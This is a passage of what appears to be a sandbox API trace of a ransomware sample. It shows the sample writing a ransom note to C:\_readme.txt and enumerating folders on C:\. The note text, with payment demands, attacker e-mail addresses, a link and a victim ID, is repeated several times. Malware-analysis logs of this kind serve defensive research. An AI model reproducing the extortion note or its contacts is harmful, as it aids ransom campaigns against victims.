hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b6d578 [0200.675] CreateFileW (lpFileName="C:\\_readme.txt" (normalized: "c:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0200.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b6dd90 [0200.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x85b) returned 0x3b6e658 [0200.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b6e658, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 1116 [0200.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b6eec0 [0200.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6e658 | out: hHeap=0x2c0000) returned 1 [0200.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6dd90 | out: hHeap=0x2c0000) returned 1 [0200.678] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned 1115 [0200.678] WriteFile (in: hFile=0x638, lpBuffer=0x3b6eec0*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x39cfb64, lpOverlapped=0x0 | out: lpBuffer=0x3b6eec0*, lpNumberOfBytesWritten=0x39cfb64*=0x45b, lpOverlapped=0x0) returned 1 [0200.679] CloseHandle (hObject=0x638) returned 1 [0200.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec0 | out: hHeap=0x2c0000) returned 1 [0200.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6d578 | out: hHeap=0x2c0000) returned 1 [0200.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65870 | out: hHeap=0x2c0000) returned 1 [0200.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.680] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x32ef1f8 [0200.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0200.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x32f9110 [0200.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0200.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0200.681] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0200.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x32ef238 [0200.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0200.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0200.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.681] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0200.681] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0200.681] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0200.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x32e5198 [0200.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0200.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ef238 | out: hHeap=0x2c0000) returned 1 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.682] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ceca8 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b98 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0200.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0200.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ceca8 | out: hHeap=0x2c0000) returned 1 [0200.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0200.682] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x61c24580, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0200.682] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x3b2fd8 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9228 [0200.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0200.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0200.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0200.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b98 | out: hHeap=0x2c0000) returned 1 [0200.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.683] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x61c24580, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0200.683] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0200.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.683] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe187b740, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe187b740, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0200.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0200.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x32b69d8 [0200.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0200.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0200.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0200.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0200.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0200.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9228 | out: hHeap=0x2c0000) returned 1 [0200.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0200.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b2fd8 | out: hHeap=0x2c0000) returned 1 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0200.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0200.684] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0200.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0200.684] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9228 [0200.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.684] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x3294350 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92c8 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0218 [0200.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9318 [0200.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0200.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0200.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0200.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0200.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0200.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9228 | out: hHeap=0x2c0000) returned 1 [0200.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0200.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9228 [0200.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.685] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x16, 